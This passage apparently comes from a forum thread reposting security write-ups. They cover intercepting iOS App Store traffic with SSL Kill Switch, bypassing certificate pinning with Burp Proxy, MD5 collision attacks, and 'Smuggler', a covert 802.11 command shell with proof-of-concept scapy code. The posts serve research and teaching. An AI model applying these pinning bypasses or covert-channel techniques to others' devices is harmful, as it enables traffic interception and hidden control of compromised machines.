restart itunesstored. This time however, MobileLoader will inject the SSL Kill Switch’s code into the process. You can validate this by looking at the device’s logs, for example using the xCode console. You should see something like this: itunesstored[1045] <Notice>: MS:Notice: Loading: /Library/MobileSubstrate/DynamicLibraries/SSLKillSwitch.dylib itunesstored[1045] <Warning>: SSL Kill Switch - Hook Enabled. If you restart the App Store app, you should then be able to proxy all the traffic and see app store transactions such as logins or app downloads. If you try to install an app while proxying, your proxy might crash or freeze when the App Store tries to download the app because IPA files can be fairly large (200+ MB). Takeaway A similar methodology could be used to proxy other system daemons including for example accountsd, which is responsible for the Twitter and Facebook integration that was added to iOS 5 and iOS 6. While working on this, I also discovered a better way to disable SSL certificate validation and certificate pinning in iOS apps. Hence, SSL Kill Switch v0.5 is actually a complete rewrite. If you’re interested in knowing how it works, I wrote a blog post explaining what the tool does. Sursa: https://nabla-c0d3.github.io/blog/2013/08/20/intercepting-the-app-stores-traffic-on-ios/

iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill switch - Prateek Gianchandani In this article, we will look at how we can analyze network traffic for applications that use certificate pinning. One of the best definitions i found of certificate pinning is mentioned below. It is taken directly from this url. By default, when making an SSL connection, the client checks that the server’s certificate: has a verifiable chain of trust back to a trusted (root) certificate matches the requested hostname What it doesn’t do is check if the certificate in question is a specific certificate, namely the one you know your server is using. Relying on matching certificates between the device’s trust store and the remote server opens up a security hole. The device’s trust store can easily be compromised – the user can install unsafe certificates, thus allowing potential man-in-the-middle attacks. Certificate pinning is the solution to this problem. It means hard-coding the certificate known to be used by the server in the mobile application. The app can then ignore the device’s trust store and rely on its own, and allow only SSL connections to hosts signed with certificates stored inside the application. This also gives a possibility of trusting a host with a self-signed certificate without the need to install additional certificates on the device. Certificate pinning is used by many popular applications for e.g Twitter, Square etc. So the question that arises is, how do you bypass this certificate validation that is happening on the client side ? The important thing to note here is all that all the validation is happening on the client side. And since there are frameworks like Mobile Substrate that allow us to patch any method during runtime and modify its implementation, it is possible to disable the certificate validation that is happening in the application. A POC tool for this by released in Blackhat and it was named iOS SSL Kill Switch. The full presentation can be found here. After some time, the author realized that he was able to inspect traffic from apps that used certificate pinning (for e.g Twitter), but he wasn’t able to see the traffic going through the App Store app. He then realized he needed to patch even more low level methods and kill specific processes in order to inspect traffic going via the App store app. The full writeup for this could be found here and it’s quite interesting, so i suggest you give it a read. Also note that this tool will also be able to disable the default SSL certificate validation, so you don’t need to install a certificate as trusted root as well, which is what we usually do for inspeting traffic over HTTPs. To really check that the Twitter app uses certificate pinning, install the Twitter app and route the device traffic through Burp Proxy. Make sure you are inspect traffic via HTTP/HTTPS using the steps mentioned in Part 11 of this series. However, when you open the twitter app and navigate around, the traffic is not captured by Burpsuite. To inspect the traffic going via Twitter, ssh into your device and download the iOS SSL Kill Switch package from it’s releases link. Also, make sure to install the following packages via Cydia. dpkg MobileSubstrate PreferenceLoader Now install the deb package using the command dpkg -i . Now, respring the device using the command killall -HUP SpringBoard. Once this is done, go to Settings app. There will be a new menu for SSK Kill Switch and a slider to Disable certificate validation. Make sure the slider is set to on. Now route the traffic in the device to pass through Burp Proxy. Open twitter app and now you can see all the data going through via the twitter app as well. To verify that SSL Kill Switch is being injected into the application, go to Xcode -> Devices (I am using Xcode 6), look for your device in the left menu and click on the arrow pointing up in the lower left corner to see the device logs. You will see that SSL Kill Switch is being injected into the application. Another cool utility that does the same job is trustme. I recommend you check it out. Sursa: iOS Application Security Part 36 – Bypassing certificate pinning using SSL Kill switch - Prateek Gianchandani

Crypto collision used to hijack Windows Update goes mainstream Final nail in the coffin for the MD5 hash By John Leyden, 5 Nov 2014 The cryptographic hash collision attack used by cyberspies to subvert Microsoft's Windows Update has gone mainstream, revealing that MD5 is hopelessly broken. Security researcher Nat McHugh created two images of different rock 'n' roll icons - James Brown and Barry White - with the same MD5 hash. "The images were just two I lifted from the web ... in fact I could have chosen any image or indeed any arbitrary data and created a collision with it," McHugh reports. The process of computing padding data to produce the collision between two dissimilar images files was carried out on a mainstream cloud computing instance in a matter of hours at a cost estimated by McHugh as being less than a dollar. Brute force attempts to find cryptographic hash collisions – where two dissimilar files give the same hash value – are still impractical for anyone without access to a supercomputer. What McHugh was able to do was to add binary data to the end of two different JPEG images such that the two modified files gave the same hash value. Chosen prefix collisions for MD5 of this type were first successfully demonstrated in 2007. In a chosen prefix collision, the data preceding the specially crafted collision blocks can be completely different, as is the case of the images of the Godfather of Soul and the Walrus of Love. In a blog post, McHugh explains how he was able to work out what binary data to add to the end of the two image files. The chosen prefix collision attack works by repeatedly adding 'near collision' blocks which gradually work to eliminate the differences in the internal MD5 state until they are the same. Before this can be done the files must be of equal length and the bit differences must be of a particular form. This requires a brute force 'birthday' attack which tries random values until two are found that work. t does however have a much lower complexity than a complete brute force attack. Another researcher, Marc Stevens, has created framework for automated finding of differential paths and using them to create chosen pre-fix collisions. https://code.google.com/p/hashclash/ . McHugh chose to run Stevens's HashClash research tool on Linux, using a bash script to automate the repetitive steps needed, on an AWS GPU instance. "I found that I was able to run the algorithm in about 10 hours on an AWS large GPU instance" at a cost of around $0.65 plus tax per crack, according to McHugh. McHugh concludes that his exercise proves MD5 is hopelessly weak, outdated and no longer fit for purpose. MD5 is well and truly broken. Whilst the two images have not shown a break in the pre-image resistance or second pre-image resistance, I cannot think of a single case where the use of a broken cryptographic hash function is an appropriate choice. It was a chosen prefix collision attack similar to this that was used to produce a counterfeit SSL certificate used to sign the Flame malware as Microsoft and pass itself off as a Windows update. Other security experts were inclined to agree with McHugh's conclusion that MD5 is a dead duck. "If you can't even distinguish between Barry White and James Brown, it's time to send MD5 to hashing algorithm heaven," said Martijn Grooten, editor of Virus Bulletin and sometime security researcher, in a Twitter update. A cryptographic hash algorithm such as MD5 converts data into a shortened "message digest" from which it ought to be impossible to recover the original information. This one-way technique is used to generate digital signatures for software downloads, among other functions. Bootnote Flame used a chosen-prefix collision attack against MD5 in order to generate a rogue CA certificate. The sophisticated malware, discovered in 2012 but probably circulating since 2010, was used in a cyber-espionage attack against Middle Eastern countries. Most of the infected systems were located in Iran. The Washington Post claimed in June 2012 that Flame had been jointly developed by the NSA and Israel’s military as part of the same Olympic Games operation that spawned Stuxnet. Put very simply, Flame carried out surveillance and mapped networks while Stuxnet sabotaged the control systems of nuclear processing centrifuges. Sursa: Crypto collision used to hijack Windows Update goes mainstream • The Register

Smuggler - An interactive 802.11 wireless shell without the need for authentication or association I’ve always been fascinated by wireless communications. The ability to launch seemingly invisible packets of information up into the air without even the need to consider aerodynamics itself seems like some kind of magic. In my quest to become a wireless wizard I started looking at the 802.11 wireless protocol to find out a little more about it. I had always noticed when looking at wireless management frames in various packet dumps that a wealth of additional (and somewhat optional) information is sent between stations. Much of this additional information is not all that useful from a security perspective. This additional information that I speak of is known as “Information Elements” (IE), which are contained in 802.11 wireless management frames [1]. The Dot Eleven wiki states, “IEs are a device’s way to transfer descriptive information about itself inside management frames. There are usually several IEs inside each such frame, and each is built of type-length-values mostly defined outside the basic IEEE 802.11 specification.” With regards to IEEE 802.11, these information elements are as follows: (0) SSID, (1) Rates, (2) FHset, (3) DSset, (4) CFset, (5) TIM, (6) IBSSset, (16) challenge, (42) ERPinfo, (46) QoS Capability, (47) ERPinfo, (48) RSNinfo, (50) ESRates, (221) vendor and (68) reserved. I wanted to experiment with these IEs directly. Scapy is a powerful tool that allows such access to this layer via Dot11Elt [2]. Using Scapy I wrote some code to extract the SSID and rates IEs as a proof of concept, the code for this is below. [receiver.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements receiver POC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * def packets(pkt): if pkt.haslayer(Dot11) : if pkt.type == 0 and pkt.subtype == 8 and pkt.info == "" : # if management frame and beacon and SSID is blank print "AP MAC: %s | SSID: %s | Rates: %s" % (pkt.addr2, pkt.info, (pkt[Dot11Elt:2].info)) sniff(iface="mon0", prn = packets) This would extract the “SSID” and the “rates” IEs from all beacon management frames discovered which had a blank SSID. I then put together some code to act as the sender. Note that I am using an additional wireless card on mon1 to send packets. The receiver is using a different wireless card on mon0 to listen out for our packets. [sender.py - note: if you copy/paste from this blog the indentations will need to be fixed] #!/usr/bin/python # -- coding: utf-8 -- # wireless information elements sender PoC – Tom Neaves <tneaves@trustwave.com> import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * conf.iface="mon1" # second wireless card ssid=sys.argv[1] # takes ssid from the command line rates=sys.argv[2] # takes “rates” from the command line def SendRates(rates): frame=RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff",addr2=RandMAC(),addr3=RandMAC())/Dot11Beacon(cap="ESS")/ Dot11Elt(ID="SSID",len=len(ssid),info=ssid)/Dot11Elt(ID="Rates",info=rates)/ Dot11Elt(ID="DSset",info="\x03")/Dot11Elt(ID="TIM",info="\x00\x01\x00\x00") sendp(frame, verbose=1) SendRates(rates) # python sender.py “” rateshere The command above will result in a beacon management frame sent into the airwaves with a blank SSID and a “rates” information element of “rateshere”. The receiver will parse the frame and print the rates content out to the screen, in this case “rateshere”. I just utilised an IE in a way not originally intended to pass a message. At this point I did a little digging to determine if I was the first to stumble on this little gem. Turns out yes and no. Chandra, et al. [3] in 2007 explored hacking up the 802.11 protocol in order to broadcast additional information without the need for association. This was in the form of SSID and BSSID concatenation and adding in additional IEs to broadcast “coupons” for advertising purposes. The paper did not, however, discuss modifying using it as a two-way communications channel. Gupta V. and Rohil M.K. [4] in 2013 hacked up the 802.11 protocol to transmit information within the "Length" fields of the IEs. However, again this is only for broadcast purposes. So it seems that I am a little late to the party, however it also appears that I am doing things a little different – I am injecting into the actual IE. Furthermore, the research falls short on being restricted to a one way broadcast. What if I could create a two-way covert communications channel? Furthermore, what could I create without the fuss of association and authentication that is usually required in wireless networks before such communications can begin? What if an attacker could send commands and receive the output on this channel? That would be magic++ and then some. Ladies and gentlemen, I present you Smuggler. I expanded on the proof of concepts already discussed to create a tool called Smuggler. It is a two-way covert communications channel, which consists of an interactive wireless shell without the need for association or authentication, and it works like this: An attacker compromises a machine and starts up a receiver (client.py), much like the proof of concept. The receiver listens to management beacon frames with a blank SSID and, when spotted, extracts the rates IE. The evolution here from the proof of concept (v2.0 if you like…) is that the receiver has the operating system parse the rates IE as a command. The attacker leaves the compromised machine with the receiver running and heads off to grab some lunch. Enter the next act. The attacker comes back the next morning, sitting in the car park with a latte. The attacker uses Smuggler (smuggler.py) to create a management beacon frame (with a blank SSID) and a rates IE with their very own command. Now here comes the clever bit - the receiver parses the command found in the rates IE as already discussed, but wait, it then invokes clientprobe.py to construct management probe requests with the output of the command as the SSID. Smuggler on the attacker’s machine is listening out for these management probe requests and extracts the SSID, hence the output. The information is presented in an attractive looking shell not unlike bash. So, to summarise: Receiver (client.py): If management and beacon frame (AND blank SSID) seen, read rates (attackers_command) IE and send to the OS to parse. Process attackers_command Attacker send commands (smuggler.py): Construct management beacon frame (AND blank SSID) with a custom rates IE. Rates = attackers_command Exfiltration (clientprobe.py): Management frame, probe request, SSID = outputofcommand As a proof of concept the same machine is being used with two wireless cards, however, this would work exactly the same on two computers. The example below shows the attacker issuing the “who” command wirelessly (in the “rates” IE) through the wireless card on mon1 in a management beacon frame. The receiver parses this command and sends the output back wirelessly over another wireless card on mon0 via the SSID of a management frame probe request. What happens “under the hood” within the airwaves is shown below. Another proof of concept for your viewing pleasure. A number of text files which exist on the victim machine: The attacker recreates these commands over the wireless airwaves, all without association or authentication. I am not going to release Smuggler just yet - that is not the objective of this blog post. The objective of this post is that I wanted to share my findings of abusing a protocol in a way not intended and use it for bad things, such as creating this covert two-way communications channel without associating or authenticating. I have also created Anti-Smuggler to demonstrate that it is possible to detect such attacks. However, the proof of concept I have demonstrated is pretty basic in that it does not utilise any form of encryption. You would imagine such convert channels would be reinforced with several layers of security, encryption being just one of them. For the final treat; Anti-Smuggler detecting extraction of credit cards. The regular expressions can be expanded to cover all manner of things – directory listings, extraction of the passwd file, etc. [1] Chapter 4 - 802.11 Management frames - DotEleven [2] scapy: scapy.layers.dot11.Dot11Elt Class Reference - doxygen documentation | Fossies Dox [3] Chandra R., Padhye J., Ravindranath L., Wolman A. “Beacon-Stuffing: Wi-Fi without Associations”, In Proceedings of the Eighth IEEE Workshop Mobile Computing Systems and Applications (Tucson, Arizona, February 26-27, 2007) [4] Gupta G., Rohil M.K., “Bit-Stuffing in 802.11 Beacon Frame: Embedding Non-Standard Custom Information”, International Journal of Computer Applications (0975 – 8887), Volume 63 – No. 2 (February 2013) Posted by Tom Neaves on 03 November 2014 Sursa: Smuggler - An interactive 802.11 wireless shell without the need for authentication or association - SpiderLabs Anterior